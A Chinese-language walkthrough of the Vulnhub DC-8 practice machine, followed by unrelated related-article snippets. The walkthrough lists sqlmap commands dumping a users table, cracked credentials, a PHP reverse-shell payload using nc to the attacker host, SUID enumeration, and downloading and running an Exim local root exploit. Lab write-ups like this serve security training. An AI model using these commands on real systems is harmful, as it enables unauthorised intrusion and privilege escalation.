Vulnhub靶场----8、DC-8
文章目录
- 一、环境搭建
- 二、渗透流程
- 三、思路总结
一、环境搭建
DC-8下载地址:https://download.vulnhub.com/dc/DC-8.zip
kali:192.168.144.148
DC-8:192.168.144.156
二、渗透流程
nmap -T5 -A -p- -sV -sT 192.168.144.156
思路:
1、80端口目录扫描:dirb、gobuster、dirsearch等工具;
web站点资产识别:goby、whatweb等;
web站点功能页面;
分析网页源代码;
……2、22端口
ssh爆破、有账号密码信息进行远程登录
……
1.插入'报错,尝试进行sql注入
2.爆数据库:
sqlmap -u "http://192.168.144.156/?nid=1" --dbs
3.爆d7db数据库的表:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db --tables
4.爆users表的列:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db -T 'users' --columns
5,爆users表的字段:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db -T 'users' -C uid,name,pass --dump
6.将这两个密码保存,使用john进行爆破:获取到账号密码 john:turtle
登录后台地址:
http://192.168.144.156/user/login
1.php反弹shell代码
<?php system("nc -e /bin/sh 192.168.144.148 4444");?>
2.利用python切换到bash环境
python -c 'import pty;pty.spawn("/bin/bash")'
1.利用find命令查找具有suid的root的文件
find / -perm -4000 -user root 2>/dev/null
2.查看exim具体版本
dpkg -l | grep exim
3.搜索exim 4.89的具体漏洞
searchsploit exim
4.漏洞利用
拷贝46996.sh到桌面
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh
在46996.sh内容中添加:set ff=unix,否则会报如下错误:
kali 开启临时HTTP服务器
python -m SimpleHTTPServer
下载shell到/tmp临时文件目录
#下载kali主机46996.sh文件至靶机shell的/tmp目录下
wget http://192.168.144.148:8000/46996.sh
#并赋予权限
chmod 777 46996.sh
./46996.sh -m netcat
三、思路总结
1、信息收集
2、利用SQL注入获取账号密码
3、登陆后台
4、插入脚本反弹shell
5、exim漏洞
6、SUID提权
参考链接:https://blog.mzfr.me/vulnhub-writeups/2019-09-5-DC8
相关文章:
Vulnhub靶场----8、DC-8
文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-8下载地址:https://download.vulnhub.com/dc/DC-8.zip kali:192.168.144.148 DC-8:192.168.144.156 二、渗透流程 1、信息收集nmap -T5 -A -p- -sV -sT 192.168.144.156思路&am…...
Makefile 和 Shell 脚本的区别与联系
以下内容转载于博客Makefile 和 shell 脚本的区别与联系,有删改与内容添加。 参考内容:初学Makefile指南 一、什么是 Makefile? Makefile 描述了整个工程的编译、链接规则。当源码文件比较多的时候就不适合通过输入 gcc 命令来编译…...
java25种设计模式之工厂模式
Java设计模式 - 工厂模式 工厂模式是一种创建模式,因为此模式提供了更好的方法来创建对象。 在工厂模式中,我们创建对象而不将创建逻辑暴露给客户端。 例子 在以下部分中,我们将展示如何使用工厂模式创建对象。 由工厂模式创建的对象将是…...
力扣-2020年最后一次登录
大家好,我是空空star,本篇带大家了解一道简单的力扣sql练习题。 文章目录前言一、题目:1890. 2020年最后一次登录二、解题1.正确示范①提交SQL运行结果2.正确示范②提交SQL运行结果3.正确示范③提交SQL运行结果4.正确示范④提交SQL运行结果5.…...
[蓝桥杯] 数学与简单DP问题
文章目录 一、简单数学问题习题练习 1、1 买不到的数目 1、1、1 题目描述 1、1、2 题解关键思路与解答 1、2 饮料换购 1、2、1 题目描述 1、2、2 题解关键思路与解答 二、DP问题习题练习 2、1 背包问题 2、1、1 题目描述 2、1、2 题解关键思路与解答 2、2 摘花生 2、2、1 题目…...
浏览器的渲染过程解析
文章目录浏览器渲染进程有哪些?浏览器的渲染过程浏览器渲染进程有哪些? GUI线程:负责渲染浏览器页面,解析html,css,构建DOM树,CSS规则树,渲染树和绘制页面,当界面需要重…...
【C++容器】std::fstream读写文件错误【2023.03.03】
std::fstream使用细节 1.文件不存不支持时打开文件模式不得有ios::in • 如果文件不存在且打开时包括了ios::in模式则打开文件会失败。 fstream m_f;m_f.open("d://123.csv", ios::in | ios::out | ios::binary);//文件不存在则会打开失败• 我这边尝试行得通的做…...
UVM实战--带有寄存器的加法器
一.整体的设计结构图 这里将DUT换成加法器,可以理解为之前UVM加法器加上寄存器,这里总线的功能不做修改,目的看代码的移植那些部分需要修改。 二.各个组件代码详解 2.1 DUT module dut( input clk, input rst_n, input…...
笔记--学习mini3d代码
主要是记录学习mini3d代码时,查的资料; 从github下载的代码: GitHub - skywind3000/mini3d: 3D Software Renderer in 700 Lines !!3D Software Renderer in 700 Lines !! Contribute to skywind3000/mini3d development by creating an a…...
图片服务器
文章目录一、项目简介二、功能及场景三、业务设计四、数据库设计准备图片表准备实体类五、API设计常用功能封装文件上传文件上传获取图片列表接口获取图片内容删除图片接口六、项目优化七、测试自动化测试测试用例一、项目简介 图片服务器:解决项目中插入图片的问题…...
【JAVA程序设计】【C00110】基于SSM(非maven)的车辆维修管理系统
基于SSM(非maven)的车辆维修管理系统项目简介项目获取开发环境项目技术运行截图项目简介 基于ssm框架非maven开发的车辆维修管理系统共分为三个角色:管理员、用户 管理员角色包含以下功能: 查看用户、添加用户、查看车辆信息、故…...
【中学里的解题技巧】)
微积分小课堂:用动态的眼光去找问题的最优解(最大值/最小值)【中学里的解题技巧】
文章目录 引言I 最优化问题1.1 不同形式的最优化1.2 用动态的眼光去找问题的最优解引言 把比较数大小的问题,变成了寻找函数变化拐点的问题,将这两个问题等同起来,需要发明一种工具,叫做导数。有了导数这个工具,求最大值问题就变成了解方程的问题。 用变化的眼光找到最优…...
网络爬虫和相关工具
在理想的状态下,所有ICP(Internet Content Provider)都应该为自己的网站提供API接口来共享它们允许其他程序获取的数据,在这种情况下爬虫就不是必需品,国内比较有名的电商平台(如淘宝、京东等)、…...
OSSFs挂载工具简介
OSSFs挂载工具 OSSFs挂载工具简介 ossfs允许您在Linux系统中将对象存储OSS的存储空间(Bucket)挂载到本地文件系统。挂载完成后,您能够像操作本地文件一样操作OSS的对象(Object),从而实现数据共享。 …...
Spring 容器创建初始化,获取bean流程分析
Spring 容器创建初始化,获取bean流程分析 Spring 容器创建初始化 流程分析 1、首先读取bean.xml 文件 2、扫描指定的包 com.hspedu.spring.component 2.1、扫描包,得到bean的class对象,排除包下不是bean的 2.2、扫描将bean信息封装BeanDef…...
无聊小知识.03 Springboot starter配置自动提示
1、前言Springboot项目配置properties或yaml文件时候,会有很多spring相关的配置提示。这个是如何实现的?如果我们自己的配置属性,能否也自动提示?2、Springboot配置自动提示其实IDE是通过读取配置信息的元数据而实现自动提示的。S…...
2023-03-03 mysql-join类别-分析
目录 摘要: mysql版本: DDL: 表结构: 插入数据: JOIN: 一. SELECT 二. INNER JOIN...
Saleen 系列来袭!
由 Ghostopunch 创作👻🥊 Ghostpunch 将 Saleen Automotive 带入 The Sandbox 元宇宙! 是 Saleen Automotive 于 1984 年由汽车界的梦想家 Steve Saleen 创立,目标是将经过比赛验证的性能带入大街小巷和元宇宙……😉 5…...
如何优雅地处理Java中的null值?使用Optional类来实现!
当我们在Java编程时,经常会遇到处理null值的问题。在Java 8中,引入了一个Optional类来解决这个问题。Optional类可以看作是一个容器,用于包装一个可能为null的值。它提供了一些方便的方法,以优雅地处理null值的情况。 下面我将详…...
巾帼绽芬芳 一起向未来(中篇)
编者按:为了隆重纪念纪念“三八”国际妇女节113周年,快来与你全方位、多层次分享交流“三八”国际妇女节的前世今生。分上篇(节日简介、节日发展和节日意义)、中篇(节日活动宗旨和世界各国庆祝方式)和下篇&…...
终极Goyo.vim配置指南:打造完美无干扰写作环境的10个技巧
终极Goyo.vim配置指南:打造完美无干扰写作环境的10个技巧 【免费下载链接】goyo.vim :tulip: Distraction-free writing in Vim 项目地址: https://gitcode.com/gh_mirrors/go/goyo.vim Goyo.vim是一款专为Vim用户设计的无干扰写作插件,它能帮助你…...
Qwen3-TTS-Tokenizer-12Hz优化技巧:如何提升语音压缩与重建速度?
Qwen3-TTS-Tokenizer-12Hz优化技巧:如何提升语音压缩与重建速度? 1. 理解Qwen3-TTS-Tokenizer-12Hz的核心优势 1.1 超低采样率带来的效率革命 Qwen3-TTS-Tokenizer-12Hz最显著的特点是12Hz的超低采样率。这意味着: 传统音频处理通常使用1…...
Onekey Steam Depot清单下载器:3分钟快速获取Steam游戏配置文件的终极指南 [特殊字符]
Onekey Steam Depot清单下载器:3分钟快速获取Steam游戏配置文件的终极指南 🚀 【免费下载链接】Onekey Onekey Steam Depot Manifest Downloader 项目地址: https://gitcode.com/gh_mirrors/one/Onekey 还在为复杂的Steam游戏清单获取流程而烦恼吗…...
Fluvio Connectors 终极指南:5步快速构建实时数据管道
Fluvio Connectors 终极指南:5步快速构建实时数据管道 【免费下载链接】fluvio 🦀 event stream processing for developers to collect and transform data in motion to power responsive data intensive applications. 项目地址: https://gitcode.c…...
10个imaskjs性能优化技巧:大型表单与高频输入场景的终极实践指南
10个imaskjs性能优化技巧:大型表单与高频输入场景的终极实践指南 【免费下载链接】imaskjs vanilla javascript input mask 项目地址: https://gitcode.com/gh_mirrors/im/imaskjs imaskjs是一个功能强大的JavaScript输入掩码库,专为处理表单输入…...
Ostrakon-VL-8B图文对话实战:上传厨房照片→提问卫生问题→获取结构化反馈
Ostrakon-VL-8B图文对话实战:上传厨房照片→提问卫生问题→获取结构化反馈 想象一下,你是一家连锁餐厅的卫生督导员,每周要巡查几十家门店的厨房。传统方式是什么?拿着检查表,挨个角落拍照,回到办公室再整…...
)
C#运动控制入门:从零开始用PID算法控制伺服电机(附完整代码)
C#运动控制入门:从零开始用PID算法控制伺服电机(附完整代码) 第一次尝试用代码控制伺服电机时,我盯着那台嗡嗡作响的设备,看着它时而抽搐、时而狂奔,完全不像预期那样优雅地移动到指定位置。那一刻我意识到…...
)
SAP MM新手避坑指南:手把手教你搞定UB型STO库存调拨(从ME21N到MIGO全流程)
SAP MM新手避坑指南:手把手教你搞定UB型STO库存调拨(从ME21N到MIGO全流程) 刚接触SAP MM模块的新手,面对库存转储订单(STO)这个看似简单实则暗藏玄机的功能时,往往会在UB型订单的创建和操作过程…...
终极鸣潮自动化工具指南:3步实现智能后台战斗与资源收集
终极鸣潮自动化工具指南:3步实现智能后台战斗与资源收集 【免费下载链接】ok-wuthering-waves 鸣潮 后台自动战斗 自动刷声骸 一键日常 Automation for Wuthering Waves 项目地址: https://gitcode.com/GitHub_Trending/ok/ok-wuthering-waves ok-ww是一款基…...
小型团队应用:3人使用OpenClaw+SecGPT-14B协作安全审计
小型团队应用:3人使用OpenClawSecGPT-14B协作安全审计 1. 为什么我们需要协作式安全审计工具 去年我们团队接手了一个金融系统的安全审计项目,三个人需要在一周内完成代码审计、漏洞扫描和报告撰写。最初我们尝试用传统方式:各自用本地工具…...